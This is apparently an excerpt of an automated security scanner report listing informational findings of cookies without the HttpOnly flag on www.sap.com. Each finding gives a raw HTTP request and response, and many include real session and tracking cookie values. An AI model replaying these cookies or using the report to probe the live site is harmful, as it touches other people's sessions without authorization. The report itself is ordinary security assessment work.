SAP.SITE.COOKIE=cmpgn.code=CRM-US11-XEC-CS11TRIAL&cmpn=CRM-GM09-SMP-SAPCOM&profile_checked=http%3a%2f%2fwww.sap.com%2fabout-sap%2fevents%2fworldtour%2findex.epx

{"method":"TrackEventInteraction","arguments":["http://www.sap.com/index.epx#/buy-now/index.epx?class=utilitynav-buy","","CLICK","Shop the Business Center","http://store.sap.com/","","ClickArea=CTA","
...[SNIP]...

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 0
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Mon, 14-Oct-2013 14:32:46 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Fri, 13-Jan-2012 15:32:46 GMT; path=/
Set-Cookie: SAP.SITE.COOKIE=cmpgn.code=CRM-US11-XEC-CS11TRIAL&cmpn=CRM-GM09-SMP-SAPCOM%3bCRM-US11-XEC-CS11TRIAL&profile_checked=http%3a%2f%2fwww.sap.com%2fabout-sap%2fevents%2fworldtour%2findex.epx; domain=.sap.com; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 14:32:46 GMT

12.48. http://www.sap.com/about-sap/company/legal/privacy.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sap.com
Path:   /about-sap/company/legal/privacy.epx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /about-sap/company/legal/privacy.epx?sapmtn=emptypageforinlineframe&kNtBzmUK9zU=1 HTTP/1.1
Host: www.sap.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: nwt=wetnow; ARPT=ONKKMMS169.145.6.18CKMMM; client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; session=cd0b6b7c-45df-415c-9ca0-02363c80f71d; SAP.TTC=1318688442; CountryRedirectFlag=1; SelectedCountryUrl=/index.epx; 37021986-VID=546022977410; 37021986-SKEY=449600187523043155; HumanClickSiteContainerID_37021986=STANDALONE; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:01:42 GMT; path=/
Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 16:01:42 GMT; path=/
Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|LOB=PTWN000005,9|SEGMENT=SEG0001,9|INDUSTRY=INDA000018,9|; domain=.sap.com; expires=Mon, 15-Oct-2012 15:01:42 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:01:42 GMT
Content-Length: 22056


<html>
   <head>
       <title>SAP - SAP Privacy Statement</title>    
       <meta http-equiv=Content-Type content="text/html; charset=utf-8">
       <meta id="metaContentLanguage" http-equiv="Content-Language" co
...[SNIP]...
12.49. http://www.sap.com/about-sap/events/worldtour/index.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sap.com
Path:   /about-sap/events/worldtour/index.epx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /about-sap/events/worldtour/index.epx HTTP/1.1
Host: www.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sapphirenow.com/login.aspx?ReturnUrl=%2fdefault.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nwt=wetnow; ARPT=ONKKMMS169.145.6.18CKMMM; session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; ASP.NET_SessionId=lses3swo01d05twdca0myv0y; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM; 37021986-VID=5110247826455; 37021986-SKEY=3723022180028337440; HumanClickSiteContainerID_37021986=STANDALONE; mbox=session#1318688512533-813903#1318690554|check#true#1318688754; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Aforums%7C1318690514391%3B%20pe%3Dno%2520value%7C1318690514393%3B%20c3%3Dno%2520value%7C1318690514395%3B%20s_nr%3D1318688714402-New%7C1321280714402%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292314404%3B%20s_visit%3D1%7C1318690514405%3B%20gpv_p47%3Dno%2520value%7C1318690514407%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D3%3B%20s_sq%3D%3B; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sapphirenow.com%2flogin.aspx%3fReturnUrl%3d%2fdefault.aspx; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Mon, 14-Oct-2013 14:25:57 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Fri, 13-Jan-2012 15:25:57 GMT; path=/
Set-Cookie: CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sapphirenow.com%2flogin.aspx%3fReturnUrl%3d%2fdefault.aspx; domain=.sap.com; path=/
Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; domain=.sap.com; expires=Mon, 15-Oct-2012 14:25:57 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 14:25:57 GMT
Content-Length: 42136


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script langua
...[SNIP]...
12.50. http://www.sap.com/asset/index.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sap.com
Path:   /asset/index.epx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /asset/index.epx HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 18873
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:02:58 GMT; path=/
Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 16:02:58 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:03:03 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!--[if IE 6 ]> <html xml:lang="en" lang="en" class="ie6" xmlns="http://www.w3.org/19
...[SNIP]...
12.51. http://www.sap.com/buy-now/index.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sap.com
Path:   /buy-now/index.epx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /buy-now/index.epx?class=utilitynav-buy&_=1318689048629 HTTP/1.1
Host: www.sap.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.sap.com/index.epx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nwt=wetnow; ARPT=ONKKMMS169.145.6.18CKMMM; session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; ASP.NET_SessionId=lses3swo01d05twdca0myv0y; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM&profile_checked=http%3a%2f%2fwww.sap.com%2fabout-sap%2fevents%2fworldtour%2findex.epx; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ablog%7C1318690649534%3B%20pe%3Dno%2520value%7C1318690649536%3B%20c3%3Dscn%253Ablog%253Abrian%2520bernard%253Atune%2520in%2520to%2520sap%2520teched%2520live%2521%7C1318690649538%3B%20s_nr%3D1318688849551-New%7C1321280849551%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292449554%3B%20s_visit%3D1%7C1318690649555%3B%20gpv_p47%3Dno%2520value%7C1318690649557%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D4%3B%20s_sq%3D%3B; 37021986-VID=5110247826455; 37021986-SKEY=3723022180028337440; HumanClickSiteContainerID_37021986=STANDALONE; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sapvirtualevents.com%2fteched%2fdefault.aspx; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; mbox=session#1318688512533-813903#1318690909|check#true#1318689109

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Mon, 14-Oct-2013 14:30:37 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Fri, 13-Jan-2012 15:30:37 GMT; path=/
Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; domain=.sap.com; expires=Mon, 15-Oct-2012 14:30:37 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 14:30:37 GMT
Content-Length: 9958


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!--[if IE 6 ]> <html xml:lang="en" lang="en" class="ie6" xmlns="http://www.w3.org/19
...[SNIP]...
12.52. http://www.sap.com/campaign/2011_CURR_SAP_Crystal_Reports_Server_2011/index.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sap.com
Path:   /campaign/2011_CURR_SAP_Crystal_Reports_Server_2011/index.epx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /campaign/2011_CURR_SAP_Crystal_Reports_Server_2011/index.epx?URL_ID=Q311_cs2011_freetrial_estore HTTP/1.1
Host: www.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://store.businessobjects.com/DRHM/store?Action=DisplayProductDetailsPage&SiteID=bobjamer&Locale=en_US&Env=BASE&productID=231860300&parentCategoryID=57065700&categoryID=57066300&_s_icmp=CG4E7A594
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nwt=wetnow; ARPT=ONKKMMS169.145.6.18CKMMM; session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; ASP.NET_SessionId=lses3swo01d05twdca0myv0y; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM&profile_checked=http%3a%2f%2fwww.sap.com%2fabout-sap%2fevents%2fworldtour%2findex.epx; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ablog%7C1318690649534%3B%20pe%3Dno%2520value%7C1318690649536%3B%20c3%3Dscn%253Ablog%253Abrian%2520bernard%253Atune%2520in%2520to%2520sap%2520teched%2520live%2521%7C1318690649538%3B%20s_nr%3D1318688849551-New%7C1321280849551%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292449554%3B%20s_visit%3D1%7C1318690649555%3B%20gpv_p47%3Dno%2520value%7C1318690649557%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D4%3B%20s_sq%3D%3B; mbox=session#1318688512533-813903#1318690909|check#true#1318689109; 37021986-VID=5110247826455; 37021986-SKEY=3723022180028337440; HumanClickSiteContainerID_37021986=STANDALONE; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fstore.businessobjects.com%2fDRHM%2fstore%3fAction%3dDisplayProductDetailsPage%26SiteID%3dbobjamer%26Locale%3den_US%26Env%3dBASE%26productID%3d231860300%26parentCategoryID%3d57065700%26categoryID%3d57066300%26_s_icmp%3dCG4E7A594; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Length: 251
Content-Type: text/html; charset=utf-8
Location: https://www.sap.com/campaign/2011_CURR_SAP_Crystal_Reports_Server_2011/index.epx?URL_ID=Q311_cs2011_freetrial_estore&kNtBzmUK9zU=1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Mon, 14-Oct-2013 14:32:09 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Fri, 13-Jan-2012 15:32:09 GMT; path=/
Set-Cookie: CodeTrackingCookie=url_campaignId=Q311_cs2011_freetrial_estore&ExternalReferrerURL=http%3a%2f%2fstore.businessobjects.com%2fDRHM%2fstore%3fAction%3dDisplayProductDetailsPage%26SiteID%3dbobjamer%26Locale%3den_US%26Env%3dBASE%26productID%3d231860300%26parentCategoryID%3d57065700%26categoryID%3d57066300%26_s_icmp%3dCG4E7A594; domain=.sap.com; path=/
Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; domain=.sap.com; expires=Mon, 15-Oct-2012 14:32:09 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 14:32:09 GMT

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://www.sap.com/campaign/2011_CURR_SAP_Crystal_Reports_Server_2011/index.epx?URL_ID=Q311_cs2011_freetrial_estore&
...[SNIP]...
12.53. http://www.sap.com/common/formAbandonWarning.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sap.com
Path:   /common/formAbandonWarning.epx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /common/formAbandonWarning.epx HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 4767
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:02:57 GMT; path=/
Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 16:02:57 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:02:57 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!--[if IE 6 ]> <html xml:lang="en" lang="en" class="ie6" xmlns="http://www.w3.org/19
...[SNIP]...
12.54. http://www.sap.com/country-selector.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sap.com
Path:   /country-selector.epx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /country-selector.epx HTTP/1.1
Host: www.sap.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.sap.com/index.epx
Cookie: nwt=wetnow; ARPT=ONKKMMS169.145.6.18CKMMM; client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; session=cd0b6b7c-45df-415c-9ca0-02363c80f71d; SAP.TTC=1318688442

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 14:20:48 GMT; path=/
Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 15:20:48 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 14:20:47 GMT
Content-Length: 16973


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!--[if IE 6 ]> <html xml:lang="en" lang="en" class="ie6" xmlns="http://www.w3.org/19
...[SNIP]...
12.55. http://www.sap.com/customer-showcase/growth/index.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sap.com
Path:   /customer-showcase/growth/index.epx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /customer-showcase/growth/index.epx HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 43268
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:02:37 GMT; path=/
Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 16:02:37 GMT; path=/
Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|LOB=PTWN000005,9|SEGMENT=SEG0003,9|INDUSTRY=INDA000003,9|; domain=.sap.com; expires=Mon, 15-Oct-2012 15:02:37 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:02:37 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script langua
...[SNIP]...
12.56. http://www.sap.com/customer-showcase/innovation/index.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sap.com
Path:   /customer-showcase/innovation/index.epx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /customer-showcase/innovation/index.epx?olt=CG4D999063 HTTP/1.1
Host: www.sap.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.sap.com/index.epx
Cookie: nwt=wetnow; ARPT=ONKKMMS169.145.6.18CKMMM; client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; session=cd0b6b7c-45df-415c-9ca0-02363c80f71d; SAP.TTC=1318688442; CountryRedirectFlag=1; mbox=check#true#1318688544|session#1318688461599-607633#1318690344; SelectedCountryUrl=/index.epx; 37021986-VID=546022977410; 37021986-SKEY=449600187523043155; HumanClickSiteContainerID_37021986=STANDALONE

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:01:14 GMT; path=/
Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 16:01:14 GMT; path=/
Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|LOB=PTWN000005,9|SEGMENT=SEG0001,9|INDUSTRY=INDA000018,9|; domain=.sap.com; expires=Mon, 15-Oct-2012 15:01:14 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:01:14 GMT
Content-Length: 39995


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script langua
...[SNIP]...
12.57. http://www.sap.com/customer-showcase/meetcustomers/index.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sap.com
Path:   /customer-showcase/meetcustomers/index.epx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /customer-showcase/meetcustomers/index.epx HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 42048
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:02:38 GMT; path=/
Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 16:02:38 GMT; path=/
Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|LOB=PTWN000005,9|SEGMENT=SEG0003,9|INDUSTRY=INDA000003,9|; domain=.sap.com; expires=Mon, 15-Oct-2012 15:02:38 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:02:37 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script langua
...[SNIP]...
12.58. http://www.sap.com/customer-testimonials/index.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sap.com
Path:   /customer-testimonials/index.epx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /customer-testimonials/index.epx?_=1318688501071 HTTP/1.1
Host: www.sap.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
X-SAP-Referer: http://www.sap.comzzzzzz=yyyyy
Referer: http://www.sap.com/index.epx
Cookie: nwt=wetnow; ARPT=ONKKMMS169.145.6.18CKMMM; client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; session=cd0b6b7c-45df-415c-9ca0-02363c80f71d; SAP.TTC=1318688442; CountryRedirectFlag=1; mbox=check#true#1318688544|session#1318688461599-607633#1318690344; SelectedCountryUrl=/index.epx; 37021986-VID=546022977410; 37021986-SKEY=449600187523043155; HumanClickSiteContainerID_37021986=STANDALONE

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Mon, 14-Oct-2013 14:39:12 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Fri, 13-Jan-2012 15:39:12 GMT; path=/
Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; domain=.sap.com; expires=Mon, 15-Oct-2012 14:39:12 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 14:39:12 GMT
Content-Length: 32648


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!--[if IE 6 ]> <html xml:lang="en" lang="en" class="ie6" xmlns="http://www.w3.org/19
...[SNIP]...
12.59. http://www.sap.com/global/client_functions.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sap.com
Path:   /global/client_functions.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /global/client_functions.js HTTP/1.1
Host: www.sap.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
